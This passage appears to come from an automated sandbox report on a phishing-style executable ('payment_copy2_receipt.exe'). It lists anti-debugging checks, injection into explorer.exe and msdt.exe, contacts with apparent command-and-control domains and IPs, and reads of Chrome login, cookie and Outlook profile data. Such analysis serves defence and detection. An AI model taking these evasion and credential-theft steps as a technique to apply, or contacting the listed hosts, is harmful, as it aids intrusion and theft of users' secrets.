Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7746D mov eax, dword ptr fs:[00000030h] 3_2_00A7746D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8A44B mov eax, dword ptr fs:[00000030h] 3_2_00A8A44B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h] 3_2_00AEC450
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h] 3_2_00AEC450
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A835A1 mov eax, dword ptr fs:[00000030h] 3_2_00A835A1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A81DB5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A81DB5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A81DB5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h] 3_2_00B205AC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h] 3_2_00B205AC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h] 3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h] 3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h] 3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h] 3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h] 3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h] 3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h] 3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h] 3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h] 3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A8FD9B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A8FD9B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B08DF1 mov eax, dword ptr fs:[00000030h] 3_2_00B08DF1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A6D5E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A6D5E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B28D34 mov eax, dword ptr fs:[00000030h] 3_2_00B28D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1E539 mov eax, dword ptr fs:[00000030h] 3_2_00B1E539
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h] 3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h] 3_2_00A84D3B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h] 3_2_00A84D3B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h] 3_2_00A84D3B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5AD30 mov eax, dword ptr fs:[00000030h] 3_2_00A5AD30
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00ADA537 mov eax, dword ptr fs:[00000030h] 3_2_00ADA537
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h] 3_2_00A7C577
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h] 3_2_00A7C577
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A93D43 mov eax, dword ptr fs:[00000030h] 3_2_00A93D43
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD3540 mov eax, dword ptr fs:[00000030h] 3_2_00AD3540
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B03D40 mov eax, dword ptr fs:[00000030h] 3_2_00B03D40
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A77D50 mov eax, dword ptr fs:[00000030h] 3_2_00A77D50
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD46A7 mov eax, dword ptr fs:[00000030h] 3_2_00AD46A7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B20EA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B20EA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B20EA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEFE87 mov eax, dword ptr fs:[00000030h] 3_2_00AEFE87
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A676E2 mov eax, dword ptr fs:[00000030h] 3_2_00A676E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A816E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A816E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B28ED6 mov eax, dword ptr fs:[00000030h] 3_2_00B28ED6
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A836CC mov eax, dword ptr fs:[00000030h] 3_2_00A836CC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A98EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A98EC7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B0FEC0 mov eax, dword ptr fs:[00000030h] 3_2_00B0FEC0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5E620 mov eax, dword ptr fs:[00000030h] 3_2_00A5E620
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B0FE3F mov eax, dword ptr fs:[00000030h] 3_2_00B0FE3F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h] 3_2_00A5C600
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h] 3_2_00A5C600
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h] 3_2_00A5C600
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A88E00 mov eax, dword ptr fs:[00000030h] 3_2_00A88E00
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h] 3_2_00A8A61C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h] 3_2_00A8A61C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B11608 mov eax, dword ptr fs:[00000030h] 3_2_00B11608
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6766D mov eax, dword ptr fs:[00000030h] 3_2_00A6766D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h] 3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h] 3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h] 3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h] 3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h] 3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h] 3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h] 3_2_00B1AE44
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h] 3_2_00B1AE44
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A68794 mov eax, dword ptr fs:[00000030h] 3_2_00A68794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h] 3_2_00AD7794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h] 3_2_00AD7794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h] 3_2_00AD7794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A937F5 mov eax, dword ptr fs:[00000030h] 3_2_00A937F5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h] 3_2_00A54F2E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h] 3_2_00A54F2E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8E730 mov eax, dword ptr fs:[00000030h] 3_2_00A8E730
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h] 3_2_00A7B73D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h] 3_2_00A7B73D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h] 3_2_00A8A70E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h] 3_2_00A8A70E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7F716 mov eax, dword ptr fs:[00000030h] 3_2_00A7F716
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h] 3_2_00AEFF10
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h] 3_2_00AEFF10
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h] 3_2_00B2070D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h] 3_2_00B2070D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A6FF60
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B28F6A mov eax, dword ptr fs:[00000030h] 3_2_00B28F6A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A6EF40
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0040C327 LdrLoadDll, 3_2_0040C327
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040AA91 SetUnhandledExceptionFilter, 1_2_0040AA91
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040AD6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0040AD6C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040A932
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040F6B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040F6B0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.bem4u.shop
Source: C:\Windows\explorer.exe Domain query: www.030332.com
Source: C:\Windows\explorer.exe Domain query: www.vnsuda.lol
Source: C:\Windows\explorer.exe Domain query: www.stephapproved.com
Source: C:\Windows\explorer.exe Network Connect: 75.2.115.196 80
Source: C:\Windows\explorer.exe Network Connect: 70.32.23.81 80
Source: C:\Windows\explorer.exe Network Connect: 34.110.163.134 80
Source: C:\Windows\explorer.exe Domain query: www.coolfashionshop.xyz
Source: C:\Windows\explorer.exe Network Connect: 103.100.208.243 80
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: AF0000
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\fcvvthv.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Thread register set: target process: 3320
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3320
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.310535687.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.300903726.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040ABAB cpuid 1_2_0040ABAB
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040A81B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040A81B
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Stealing of Sensitive Information

Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\msdt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY